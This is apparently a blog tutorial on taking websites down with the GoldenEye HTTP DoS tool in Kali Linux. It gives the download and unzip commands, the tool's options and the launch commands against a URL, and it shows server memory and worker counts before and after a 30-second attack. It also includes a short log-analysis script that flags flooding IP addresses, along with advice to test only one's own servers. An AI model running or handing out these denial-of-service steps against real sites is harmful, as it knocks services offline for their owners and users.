DoS website in Kali Linux using GoldenEye

I’ve talked about testing a few DoS tools that can put heavy load on HTTP servers in order to bring them to their knees by exhausting resource pools. GoldenEye is the first of those tools and it is one of the newest I discovered on GitHub. You can DoS websites with GoldenEye and bring them down within almost 30 seconds, depending on how big their memory pool is. Of course, it won’t work on protected servers or servers behind a proper WAF or IDS, but this is a great tool for load testing your own web server and amending your iptables/firewall rules accordingly.

You can also DoS using hping3 to simulate similar attacks, or use a PHP exploit to attack WordPress websites. There are also a few great tools that let you view live DDoS attack maps worldwide in almost real time.

Details for the GoldenEye tool are listed below:

From GoldenEye’s writer’s post:

  1. This tool is meant for research purposes only and any malicious usage of this tool is prohibited.
  2. GoldenEye is a Python app for SECURITY TESTING PURPOSES ONLY!
  3. GoldenEye is a HTTP DoS Test Tool.
  4. Attack Vector exploited: HTTP Keep Alive + NoCache

Types of DoS or DDoS attacks

Let’s go over some very basic info regarding DoS or DDoS attacks. There are basically three types of DoS and DDoS attacks:

  1. Application layer DoS and DDoS attacks
  2. Protocol layer DoS and DDoS attacks
  3. Volume-based DoS and DDoS attacks

Application layer DoS and DDoS attacks

Application-layer DoS and DDoS attacks target vulnerabilities in Windows, Apache, OpenBSD, or other software to perform the attack and crash the server.

Protocol layer DoS and DDoS attacks

Protocol DoS and DDoS attacks are attacks at the protocol level. This category includes SYN flood, Ping of Death, and more.

Volume-based DoS and DDoS attacks

This type of DoS and DDoS attack includes ICMP floods, UDP floods, and other kinds of floods performed via spoofed packets.

The terms DoS and DDoS are used loosely: when you attack from a single machine, it’s usually considered a DoS attack. Multiply that single attacker into a botnet (or a group) and it becomes a DDoS attack. There are many explanations, but just know that no matter which type of attack it is, they are equally detrimental to a server/network.

GoldenEye Help Menu


     /$$$$$$            /$$       /$$                     /$$$$$$$$                    
    /$$__  $$          | $$      | $$                    | $$_____/                    
   | $$  \__/  /$$$$$$ | $$  /$$$$$$$  /$$$$$$  /$$$$$$$ | $$       /$$   /$$  /$$$$$$ 
   | $$ /$$$$ /$$__  $$| $$ /$$__  $$ /$$__  $$| $$__  $$| $$$$$   | $$  | $$ /$$__  $$
   | $$|_  $$| $$  \ $$| $$| $$  | $$| $$$$$$$$| $$  \ $$| $$__/   | $$  | $$| $$$$$$$$
   | $$  \ $$| $$  | $$| $$| $$  | $$| $$_____/| $$  | $$| $$      | $$  | $$| $$_____/
   |  $$$$$$/|  $$$$$$/| $$|  $$$$$$$|  $$$$$$$| $$  | $$| $$$$$$$$|  $$$$$$$|  $$$$$$$
    \______/  \______/ |__/ \_______/ \_______/|__/  |__/|________/ \____  $$ \_______/
                                                                     /$$  | $$          
                                                                    |  $$$$$$/          
                                                                     \______/           

This tool is a dos tool that is meant to put heavy load on HTTP servers
in order to bring them to their knees by exhausting the resource pool.

This tool is meant for research purposes only
and any malicious usage of this tool is prohibited.

@author Jan Seidl <http://wroot.org/>

@date 2014-02-18
@version 2.1

@TODO Test in python 3.x

LICENSE:
This software is distributed under the GNU General Public License version 3 (GPLv3)

LEGAL NOTICE:
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY!
IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY
THE AUTHOR (or blackMORE Ops / darkMORE Ops) DOES NOT TAKE ANY RESPONSIBILITY FOR IT.
BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.

 

USAGE: ./goldeneye.py <url> [OPTIONS]

 OPTIONS:
    Flag           Description                     Default
    -u, --useragents   File with user-agents to use                     (default: randomly generated)
    -w, --workers      Number of concurrent workers                     (default: 50)
    -s, --sockets      Number of concurrent sockets                     (default: 30)
    -m, --method       HTTP Method to use 'get' or 'post'  or 'random'  (default: get)
    -d, --debug        Enable Debug Mode [more verbose output]          (default: False)
    -h, --help         Shows this help

Download GoldenEye

I prefer to make a folder for everything. I will just do that. You do what you need to do.

root@kali:~# mkdir GoldenEye
root@kali:~# 
root@kali:~# cd GoldenEye/
root@kali:~/GoldenEye# 
root@kali:~/GoldenEye# wget https://github.com/jseidl/GoldenEye/archive/master.zip
root@kali:~/GoldenEye#

So I made a folder named ‘GoldenEye’ and changed directory to it. Then I used wget to pull down the master archive.

Once the download completes, unzip the master.zip file.

root@kali:~/GoldenEye# unzip master.zip

This creates a new folder named GoldenEye-master.

root@kali:~/GoldenEye# 
root@kali:~/GoldenEye# ls
GoldenEye-master master.zip
root@kali:~/GoldenEye# 
root@kali:~/GoldenEye# cd GoldenEye-master/
root@kali:~/GoldenEye/GoldenEye-master# 
root@kali:~/GoldenEye/GoldenEye-master# ls
goldeneye.py README.md res util
root@kali:~/GoldenEye/GoldenEye-master#

Run GoldenEye – DoS website

This is rather easy. Following is the usage of goldeneye.py.

USAGE: ./goldeneye.py <url> [OPTIONS]

 OPTIONS:
    Flag           Description                     Default
    -u, --useragents   File with user-agents to use                     (default: randomly generated)
    -w, --workers      Number of concurrent workers                     (default: 50)
    -s, --sockets      Number of concurrent sockets                     (default: 30)
    -m, --method       HTTP Method to use 'get' or 'post'  or 'random'  (default: get)
    -d, --debug        Enable Debug Mode [more verbose output]          (default: False)
    -h, --help         Shows this help

You should schedule and announce your test window so users are aware of the possibility of an outage. Often simulations result in actual failures.

Under NO Circumstances should you run a DoS simulation/test attack against your environment without first notifying your hosting provider. This is especially true for external / full stack tests that will be going through your provider’s network.

Depending on your Linux, Windows or Mac setup (any OS that supports Python will do), you just use one of the following commands:

root@kali:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
sudo ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
python goldeneye.py http://www.goldeneyetestsite.com/

Depending on where you’ve saved the files, adjust your path and command.

Following is taken from my tests:

The attack

root@kali:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://10.0.0.101/ 

GoldenEye v2.1 by Jan Seidl <jseidl@wroot.org>

Hitting webserver in mode 'get' with 10 workers running 500 connections each. Hit CTRL+C to cancel.
^CCTRL+C received. Killing all workers
Shutting down GoldenEye
root@kali:~/GoldenEye/GoldenEye-master#

The whole attack lasted only 30 seconds.

The result

This is what I’ve seen on the server end:

Before attack

root@someserver [~]# free -m
             total       used       free     shared    buffers     cached
Mem:          1024        713        302         49          9        150
-/+ buffers/cache:        552       1001
Swap:         9990         40        160

root@someserver [~]# pgrep httpd | wc -l
11

I had a massive pool of free memory and just 11 httpd workers.

After attack

root@serv1 [~]# free -m
             total       used       free     shared    buffers     cached
Mem:          1024        101         90         49          9        150
-/+ buffers/cache:       3544        190
Swap:          990         40        150
root@someserver [~]# pgrep httpd | wc -l
174

I’ve now got just 101M free memory and 174 httpd workers.

It took only 15 seconds to push this server to its limit. Next we analyse the attack, which reveals interesting outcomes achieved by this DoS tool.
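A server-side check for the kind of load measured above, as an added example (not code from the original post or from the GoldenEye project): it reads Apache combined-format access log lines and reports client IPs that exceed a request threshold inside a sliding time window. The log format, the threshold of 20 requests per 10 seconds and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed format: Apache "combined" log (client IP, timestamp, request, status).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
)

def parse_line(line):
    """Return (ip, datetime) for a combined-format line, or None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    try:
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    except ValueError:
        return None
    return m.group("ip"), ts

def flag_flooders(lines, max_requests=20, window_seconds=10):
    """Return {ip: peak count} for clients that sent more than max_requests
    within any sliding window of window_seconds (both values are assumptions)."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)      # ip -> timestamps still inside the window
    peaks = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue                 # skip malformed lines instead of failing
        ip, ts = parsed
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()              # drop requests older than the window
        if len(q) > max_requests:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

# Constructed sample: 10.0.0.50 sends 60 requests in 6 seconds, 10.0.0.7 sends 3.
SAMPLE = [
    f'10.0.0.50 - - [18/Feb/2014:10:00:{i // 10:02d} +0000] "GET / HTTP/1.1" 200 512 "-" "ua"'
    for i in range(60)
] + [
    f'10.0.0.7 - - [18/Feb/2014:10:00:{s:02d} +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "ua"'
    for s in (1, 5, 9)
] + ["garbage line"]

if __name__ == "__main__":
    for ip, peak in flag_flooders(SAMPLE).items():
        print(f"{ip}: {peak} requests within 10s")
```

Addresses it reports are candidates for the iptables/firewall rules mentioned at the top of this post; tune the threshold against your normal traffic first.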

14 comments

  1. nice writeup. maybe one about slowloris someday?

  2. Very nice write up. I attacked my internet mail server (Exchange 2013) and after running it twice I wasn’t able to connect from the outside anymore. Perhaps you can advise people who test this to use an internal webserver like Exchange so no illegal activity is done on the network of the provider. Once again, great write up!
